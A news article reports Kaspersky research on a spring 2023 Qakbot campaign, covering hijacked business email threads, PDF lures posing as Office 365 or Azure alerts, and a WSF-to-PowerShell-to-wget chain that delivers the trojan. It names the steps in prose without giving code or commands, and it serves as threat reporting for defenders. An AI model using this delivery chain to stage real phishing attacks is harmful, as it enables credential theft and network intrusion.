Researchers are seeing a “significant increase” in attacks deploying the Qakbot malware, which have targeted victims in Germany, Argentina, Italy, Algeria, Spain, the U.S. and other countries with emails containing PDF attachments that deliver the banking trojan.
Qakbot, which was first detected in 2007, has since grown into a multi-purpose malware with multiple functionalities, including tools for performing reconnaissance, exfiltrating data and delivering other payloads. Its modular nature gives it flexibility for keeping up with the evolving threat landscape, and the malware has recently seen growing popularity among a variety of threat groups that either use its various capabilities or any of its second-stage payloads.
Attackers deploying the malware have previously relied on hijacked email threads (harvested in bulk from Microsoft ProxyLogon), as detailed last year by Cisco Talos researchers; this more recent spate of infections relies on a similar method, said researchers with Kaspersky on Monday. Researchers said at least 4,500 spam emails have been sent in this wave of attacks, which they first observed April 4. Corporate email accounts have been targeted, with victims in the hospitality, wholesale and IT sectors, said researchers.
“The malware would be delivered through e-mail letters written in different languages — variations of them were coming in English, German, Italian, and French,” said Victoria Vlasova, Andrey Kovtun and Darya Ivanova, researchers with Kaspersky, in a Monday report. “The messages were based on real business letters the attackers had gotten access to, which afforded them the opportunity to join the correspondence thread with messages of their own.”
Attackers are using simulations of business emails they were able to access in order to lure users to open the PDF; while the legitimate senders’ names populate the “From” field, in actuality the email address comes from a fraudulent account. These emails have a variety of business-related purposes. In some emails, for instance, attackers asked targets to provide all the documentation pertaining to an attached “application,” or to calculate the contract value based on attached “cost estimates.”
“Hackers gain access to genuine business correspondence (QBot, among other things, steals locally stored emails from previous victims’ computers) and join the dialogue, sending their messages as if they’re carrying on an old conversation,” said Darya Ivanova, malware analyst at Kaspersky. “We assume that the attackers steal the correspondence, but do not get access to the email account. This means they typically send messages from their own email address intended for malicious activities.”
The PDF imitates a Microsoft Office 365 or Azure alert telling the user to click Open to view attached files, and if clicked on, eventually leads to a downloaded archive containing a Windows Script File (WSF), which in turn executes a PowerShell script. This script uses wget to download a DLL file from a remote server, which eventually delivers Qakbot. This attack chain is slightly different from previous infections, said Ivanova, which have instead included malicious scripts in password protected archives, malicious scripts that are dropped from HTML-files, malicious scripts embedded in OneNote documents and WSF files wrapped in IMG files in password protected archives.
“We have analyzed the Qbot samples from the current e-mail campaign. The bot’s configuration block features company name ‘obama249’ and time stamp ‘1680763529’ (corresponding to April 6, 2023 6:45:29), as well as over a hundred IP addresses the bot will be using to connect to command servers,” said researchers. “Most of these addresses belong to those users, whose infected systems provide an entry point into the chain which is used to redirect the botnet traffic to real command servers.”
The banking trojan has received various module modifications over time to improve its effectiveness, and its distribution methods have also evolved from compromised websites in its early days to now include phishing and spam attacks. However, researchers said that the malware’s functionality has remained mostly unchanged over the past few years.
“As before, the bot is capable of extracting passwords and cookies from browsers, stealing letters from your mailbox, intercepting traffic, and giving operators remote access to the infected system,” said researchers. “Depending on the value of the victim, additional malware can be downloaded locally, such as CobaltStrike (to spread the infection through the corporate network) or various ransomware. Or else the victim’s computer can be turned into a proxy server to facilitate redirection of traffic, including spam traffic.”